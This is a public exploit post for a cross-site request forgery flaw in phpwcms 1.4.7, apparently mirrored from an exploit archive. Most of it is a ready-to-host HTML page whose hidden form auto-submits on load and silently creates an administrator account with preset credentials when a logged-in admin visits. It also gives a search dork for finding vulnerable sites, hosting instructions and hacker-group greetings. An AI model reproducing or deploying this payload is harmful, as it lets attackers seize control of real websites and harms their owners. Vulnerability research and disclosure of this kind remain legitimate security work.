Home / os / palm

phpwcms 1.4.7 Cross Site Request Forgery

Posted on 28 April 2011

#(+) Exploit Title: phpwcms v1.4.7 XSRF Vulnerability(Add Admin User)
#(+) Author    : ^Xecuti0n3r
#(+) E-mail    : xecuti0n3r()yahoo.com
#(+) Category  : Web Apps [XSRF]
#(+) Dork      : intext:"phpwcms Copyright"
#(+) Download Link : http://phpwcms.googlecode.com/files/phpwcms_r412.zip
#(+) PHPCMS Official website : http://www.phpwcms.de/

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_<_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ >> Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm ^Xecuti0n3r member from Inj3ct0r Team              1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


#All you have to do is save the below code as exploit.html
#Then Host a website with the exploit.html file. A person with admin permissions if visits the site,
# will automatically add the attacker as Admin without warning ;)
____________________________________________________________________
____________________________________________________________________
Code:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>phpwcms v1.4.7 XSRF Vulnerability(Add Admin User)</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
var count = 2;
var i=0;

for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}

</script>
<H2>phpwcms v1.4.7 XSRF Vulnerability(Add Admin User)</H2>
<form method="POST" name="form0" action="http://localhost:80/phpwcms.php?do=admin&s=1">
<input type="hidden" name="form_newloginname" value="admin2"/>
<input type="hidden" name="form_newpassword" value="admin2pass"/>
<input type="hidden" name="form_newemail" value="fakeadmin2@admin.com"/>
<input type="hidden" name="form_newrealname" value="fakeadmin2"/>
<input type="hidden" name="form_feuser" value="2"/>
<input type="hidden" name="form_active" value="1"/>
<input type="hidden" name="form_admin" value="1"/>
<input type="hidden" name="form_aktion" value="create_account"/>
<input type="hidden" name="Submit" value="send user data"/>
</form>

</body>
</html>

########################################################################
(+)Exploit Coded by: ^Xecuti0N3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :)
(+)<3 to :Indian Cyber Army & Indishell Crew
########################################################################

 

TOP

Malware :

Exploits :